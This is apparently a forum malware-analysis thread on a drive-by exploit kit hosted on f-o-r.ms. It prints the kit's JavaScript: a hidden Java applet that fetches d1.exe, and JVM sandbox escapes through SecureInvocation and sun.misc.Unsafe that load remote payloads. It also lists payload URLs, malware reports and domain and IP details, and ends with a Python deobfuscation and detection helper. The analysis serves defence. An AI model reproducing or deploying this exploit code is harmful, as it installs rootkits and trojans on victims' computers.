jvmimpro = document.createElement("applet");
jvmimpro.archive = "jvmimpro.jar";
jvmimpro.code = "vmain.class";
jvmimpro.width = "1"; jvmimpro.height = "1";
var jvmimpp = document.createElement("param");
jvmimpp.name = "sdata";
jvmimpp.value = "http://f-o-r.ms/d1.exe";
jvmimpro.appendChild(jvmimpp);
document.body.appendChild(jvmimpro);
}
}catch(e) {} }

function sjvsecc() { x = x+1;
if(typeof jvmsec.getClass != "undefined") { sjvmsec(); }
else if(x < 30) { setTimeout("sjvsecc()", 300); }
}

// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://srv.f-o-r.ms/xrun.tmp;http://srv.f-o-r.ms/xpre.tmp";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

function sjvusafc() { z = z+1;
if(typeof jvmusafe.getClass != "undefined") { sjvmusaf(); }
else if(z < 30) { setTimeout("sjvusafc()", 300); }
}

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://srv.f-o-r.ms/xrun.tmp;http://srv.f-o-r.ms/xpre.tmp";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }

}  // end javaenabled
</script>
srv.f-o-r.ms/code/srun
CODE
var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft"+".XMLHTTP"); }catch(e){} }
if(xobj) {
xobj.open("GET", "/code/srun?req", false);
xobj.setRequestHeader("Request", "srun,422643300");
xobj.send(null);
response = xobj.responseText;
}
if(response.length) {
ns(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}
response = xobj.responseText is then retrieved from the server and incorporated in the decoding routine.
IPB Image

IPB Image

IPB Image
Additional files downloaded
  1. srv.f-o-r.ms/get?src=prun
  2. srv.f-o-r.ms/get?src=rasesnet
  3. srv.f-o-r.ms/get?src=erevsnet
  4. srv.f-o-r.ms/get?src=incosnet
  5. srv.f-o-r.ms/get?src=wavvsnet
  6. srv.f-o-r.ms/get?src=winvsnet
Reports.
Virut.
http://www.virustotal.com/analisis/85fd474...65c3662aad249bd
http://www.threatexpert.com/report.aspx?md...895df3298cd4b60

TDSS rootkit
http://www.virustotal.com/analisis/0c05ab4...2587bfc1f35b3d8
http://www.threatexpert.com/report.aspx?md...d5e7ff1a3636a7c

Downloader
http://www.virustotal.com/analisis/76870fb...19490b5ab5a19c1
http://www.threatexpert.com/report.aspx?md...f807d3bfc67ce4d

Vundo
http://www.virustotal.com/analisis/b6683a0...249769ae155a354
http://www.threatexpert.com/report.aspx?md...f86acf47f0639c6

VirusRemover2008
http://www.virustotal.com/analisis/db04d8c...322432f1ea5166b
http://www.threatexpert.com/report.aspx?md...c6851dc5f25894c

Vundo
http://www.virustotal.com/analisis/5821a2d...89f19f9325a9444
http://www.threatexpert.com/report.aspx?md...93761cfd85a0b9f
<h4>
IP details
</h4>
ad3.clickhype.com - 64.27.17.196
Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Name Server: NS1.DNSHAWK.COM - NS2.DNSHAWK.COM
Updated Date: 14-jan-2009
Creation Date: 01-feb-2002

Registrant:
Direct Privacy ID 48393
PO Box 12068
George Town, Grand Cayman KY1-1010
KY
1-345-745-6022

85.17.162.100

hostnames sharing ip with a-records

*.adrefer.net | *.adsrefer.net | *.adteksrv.net | *.adtkserv.net | *.awofkwy.net | *.eorsnacx.net | *.espads.net | *.f-o-r.ms | *.iefjios.net | *.iwdjiamk.net | *.kasdfps.net | *.netcrefer.net | *.svc.ms | *.tqlkg.net | *.xpseek.net | ad.adrefer.net | adnetserver.net | adpopserve.net | adpopshow.net | adrefer.net | ads.adsrefer.net | adsrefer.net | adteksrv.net | adtkserv.net | awltovhc.net | awofkwy.net | eorsnacx.net | f-o-r.ms | iefjios.net | ikwlkad.net | iwdjiamk.net | kasdfps.net | kiafjwo.net | klite..ath.cx | klite.ath.cx | netcrefer.net | netcshow.net | serv.adteksrv.net | serv.adtkserv.net | serv.netcrefer.net | srv.svc.ms | tqlkg.net | www.awofkwy.net | www.eorsnacx.net | www.espads.net | www.iefjios.net | www.iwdjiamk.net | www.kasdfps.net | www.netcrefer.net | www.tqlkg.net | www.xpseek.net | xpseek.net
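Added example (Python; my code, not from the thread): two helpers for working on the captured acxcrds and acxcobj scripts above. The first undoes the `unescape("%"+"…"+"…")` string splitting so the CLSIDs and ProgIDs being instantiated can be read directly; the second reconstructs the dropped file from the hex-text response that the VBScript writes to disk two characters at a time, applying the same "<html>" rejection the script uses and then checking for an MZ header and hashing the result for comparison with the VirusTotal reports. The sample script lines are taken from the posts; the sample response is a constructed 32-byte MZ stub, not a real payload.

```python
import hashlib
import re
from typing import Dict, List

# unescape("%"+"63%6c..."+"...")  or  Unescape("%"+"...")  with any number of "+"-joined pieces
_CALL = re.compile(r'[Uu]nescape\(\s*((?:"[^"]*"\s*\+\s*)*"[^"]*")\s*\)')
_PIECE = re.compile(r'"([^"]*)"')
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")


def decode_unescape_arg(arg: str) -> str:
    """Join the quoted pieces and percent-decode them (what unescape() does at run time)."""
    joined = "".join(_PIECE.findall(arg))
    return _PCT.sub(lambda m: chr(int(m.group(1), 16)), joined)


def deobfuscate(script: str) -> List[str]:
    """All decoded unescape()/Unescape() arguments in a script, in source order."""
    return [decode_unescape_arg(m.group(1)) for m in _CALL.finditer(script)]


def decode_hex_payload(response: str) -> bytes:
    """Mirror the VBScript: refuse short bodies and anything containing '<html>'
    (an error page), otherwise turn each pair of hex characters into one byte."""
    if len(response) <= 1 or "<html>" in response.lower():
        raise ValueError("server returned an error page, not a payload")
    return bytes.fromhex(response.strip())


def describe_payload(data: bytes) -> Dict[str, object]:
    return {
        "is_pe": data[:2] == b"MZ",
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


# Three lines copied from the captured scripts above.
SAMPLE_SCRIPT = '''
a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%"+"3a%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36"));
var b = a.CreateObject(unescape("%"+"57%53%"+"63%72%69%70%74%2e%53%68%65%6c%6c"),"");
Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%"+"48%74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
'''

# Constructed: a 32-byte DOS-header-shaped stub, hex-encoded the way the server answers.
SAMPLE_RESPONSE = (
    "4d5a9000" "03000000" "04000000" "ffff0000"
    "b8000000" "00000000" "40000000" "00000000"
)

if __name__ == "__main__":
    for ident in deobfuscate(SAMPLE_SCRIPT):
        print("instantiates:", ident)
    info = describe_payload(decode_hex_payload(SAMPLE_RESPONSE))
    print("payload:", info)
```

Decoding the sample lines yields `clsid:BD96C556-65A3-11D0-983A-00C04FC29E36`, `WScript.Shell` and `WinHttp.WinHttpRequest.5.1`, which is exactly the trio a host-based rule would want to see together: a browser-instantiated object creating a shell and an HTTP client. Run over the whole acxcobj script the same function lists every ProgID the kit tries in turn.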